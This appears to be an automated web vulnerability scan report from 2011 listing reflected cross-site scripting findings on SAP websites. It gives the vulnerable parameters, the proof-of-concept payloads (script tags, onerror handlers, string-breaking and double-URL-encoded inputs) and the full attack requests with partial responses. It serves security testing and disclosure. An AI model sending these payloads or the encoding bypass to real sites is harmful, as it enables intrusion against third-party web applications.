The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload bd310<img%20src%3da%20onerror%3dalert(1)>7e3be76c3d4 was submitted in the mbox parameter. This input was echoed as bd310<img src=a onerror=alert(1)>7e3be76c3d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload d7f05<script>alert(1)</script>7762cc0ab06 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 56ff3<script>alert(1)</script>1c85f2b1615 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mboxFactoryId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f841'%3balert(1)//e40655f8366 was submitted in the mboxFactoryId parameter. This input was echoed as 8f841';alert(1)//e40655f8366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 1af53<img%20src%3da%20onerror%3dalert(1)>2257775d063 was submitted in the msessionkey parameter. This input was echoed as 1af53<img src=a onerror=alert(1)>2257775d063 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 1cc9d<img%20src%3da%20onerror%3dalert(1)>4e366a67b73 was submitted in the msessionkey parameter. This input was echoed as 1cc9d<img src=a onerror=alert(1)>4e366a67b73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 4d316<img%20src%3da%20onerror%3dalert(1)>4a39ca00ecc was submitted in the mbox parameter. This input was echoed as 4d316<img src=a onerror=alert(1)>4a39ca00ecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 785ad<script>alert(1)</script>e8955e63c5c was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6586a"%3balert(1)//f4427f5b16c was submitted in the lang parameter. This input was echoed as 6586a";alert(1)//f4427f5b16c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf request parameter is copied into the HTML document as plain text between tags. The payload bd785<script>alert(1)</script>1c5f68d385a was submitted in the 39359%22%3E%3Cscript%3Ealert(1)%3C/script%3E322e7d1fcaf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66fe1"><script>alert(1)</script>8b27daf9eeb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg66fe1"><script>alert(1)</script>8b27daf9eeb HTTP/1.1 Host: weblogs.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:01:45 GMT Server: Apache Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 1279
3.49. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://weblogs.sdn.sap.com
Path:
/cs/user/create/cs_msg
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39359"><script>alert(1)</script>322e7d1fcaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg?39359"><script>alert(1)</script>322e7d1fcaf=1 HTTP/1.1 Host: weblogs.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:01:43 GMT Server: Apache Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 1282
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19070"><script>alert(1)</script>c23af16cf20 was submitted in the page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/26917&page=19070"><script>alert(1)</script>c23af16cf20 HTTP/1.1 Host: weblogs.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:01:50 GMT Server: Apache Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 1315
The value of the x-lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80cf2"><script>alert(1)</script>80a4f10b6b was submitted in the x-lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg?x-lr=cs_disc/80cf2"><script>alert(1)</script>80a4f10b6b&x-lr2=wlg/26917&page= HTTP/1.1 Host: weblogs.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:01:48 GMT Server: Apache Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 1314
The value of the x-lr2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e302"><script>alert(1)</script>4898dfa5535 was submitted in the x-lr2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302"><script>alert(1)</script>4898dfa5535&page= HTTP/1.1 Host: weblogs.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:01:49 GMT Server: Apache Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 1315
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7052c%253balert%25281%2529%252f%252f161ddd4d8be was submitted in the REST URL parameter 4. This input was echoed as 7052c;alert(1)//161ddd4d8be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bcb6"><script>alert(1)</script>10d38451814 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 43cae%253balert%25281%2529%252f%252f4db97354d1c was submitted in the REST URL parameter 5. This input was echoed as 43cae;alert(1)//4db97354d1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f0e85<script>alert(1)</script>334b249d7a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
3.57. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d3da<script>alert(1)</script>c5f0d095866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the x-redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59301"><script>alert(1)</script>f5151cfe29d was submitted in the x-redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the x-redirect request parameter is copied into the HTML document as plain text between tags. The payload 85ee1<script>alert(1)</script>875fad350be was submitted in the x-redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload 959bb<script>alert(1)</script>75f3445b5e2 was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the b request parameter is copied into the HTML document as plain text between tags. The payload d2745<script>alert(1)</script>43dc6059987 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 4d3c4<script>alert(1)</script>6eee8615daf was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload cb700<script>alert(1)</script>2eeb76a371d was submitted in the path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the scbcolor request parameter is copied into the HTML document as plain text between tags. The payload 7729e<script>alert(1)</script>549d8b0ab75 was submitted in the scbcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tbcolor request parameter is copied into the HTML document as plain text between tags. The payload 3ef75<script>alert(1)</script>b231ec5942f was submitted in the tbcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tipbcolor request parameter is copied into the HTML document as plain text between tags. The payload a95e1<script>alert(1)</script>200e6e3d8d3 was submitted in the tipbcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tipbgcolor request parameter is copied into the HTML document as plain text between tags. The payload a8b57<script>alert(1)</script>18fd0034016 was submitted in the tipbgcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tipborderw request parameter is copied into the HTML document as plain text between tags. The payload 2deae<script>alert(1)</script>d190c5c2481 was submitted in the tipborderw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tiptcolor request parameter is copied into the HTML document as plain text between tags. The payload bd29b<script>alert(1)</script>421f7dd0323 was submitted in the tiptcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tipw request parameter is copied into the HTML document as plain text between tags. The payload d0f9a<script>alert(1)</script>5291c05a6e9 was submitted in the tipw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 4cbfd<script>alert(1)</script>1a6c591f3ee was submitted in the w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.72. http://www.sap.com/about-sap/company/legal/privacy.epx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sap.com
Path:
/about-sap/company/legal/privacy.epx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6627b"><script>alert(1)</script>0b3746ad6a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb837'%3b4803d0e7d8 was submitted in the REST URL parameter 1. This input was echoed as cb837';4803d0e7d8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a3e9'%3b52bfc88d5b0 was submitted in the REST URL parameter 1. This input was echoed as 9a3e9';52bfc88d5b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e035'%3b9a389115ce5 was submitted in the REST URL parameter 1. This input was echoed as 9e035';9a389115ce5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76071'%3b8141102f30b was submitted in the REST URL parameter 1. This input was echoed as 76071';8141102f30b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db64f'%3b76e111cc207 was submitted in the REST URL parameter 1. This input was echoed as db64f';76e111cc207 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f647'%3bc388078568b was submitted in the REST URL parameter 1. This input was echoed as 4f647';c388078568b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34382 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:28 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:28 GMT; path=/ Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:28 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:30:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='gwtservice.epx4f647';c388078568b?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http:'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 597d9'%3bc31b6b8d8f4 was submitted in the REST URL parameter 1. This input was echoed as 597d9';c31b6b8d8f4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:14 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:14 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:14 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 14:30:14 GMT Content-Length: 8490
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='gwtservices597d9';c31b6b8d8f4'; var DOCUMENTNAME='Bridge'; if(!ACTION) var ACTION; ACTION='03';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b4a5'%3bd754e510cf4 was submitted in the REST URL parameter 1. This input was echoed as 7b4a5';d754e510cf4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news-reader7b4a5'%3bd754e510cf4/ HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 33863 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:02:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='news-reader7b4a5';d754e510cf4'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b42bf'%3bab2f3f3c6e6 was submitted in the REST URL parameter 1. This input was echoed as b42bf';ab2f3f3c6e6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /printb42bf'%3bab2f3f3c6e6/sme/search/SAP_nn6.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 33993 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:26 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:26 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:04:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='printb42bf';ab2f3f3c6e6'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a1c1'%3b2fef0b79263 was submitted in the REST URL parameter 1. This input was echoed as 4a1c1';2fef0b79263 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /print4a1c1'%3b2fef0b79263/zzzzzz=yyyyy HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 33921 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:03:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='print4a1c1';2fef0b79263'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af54'%3b4a60b9cecd6 was submitted in the REST URL parameter 1. This input was echoed as 3af54';4a60b9cecd6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2480'%3bb72d33e177b was submitted in the REST URL parameter 1. This input was echoed as a2480';b72d33e177b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /texta2480'%3bb72d33e177b/sme/search/SAP_nn6.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
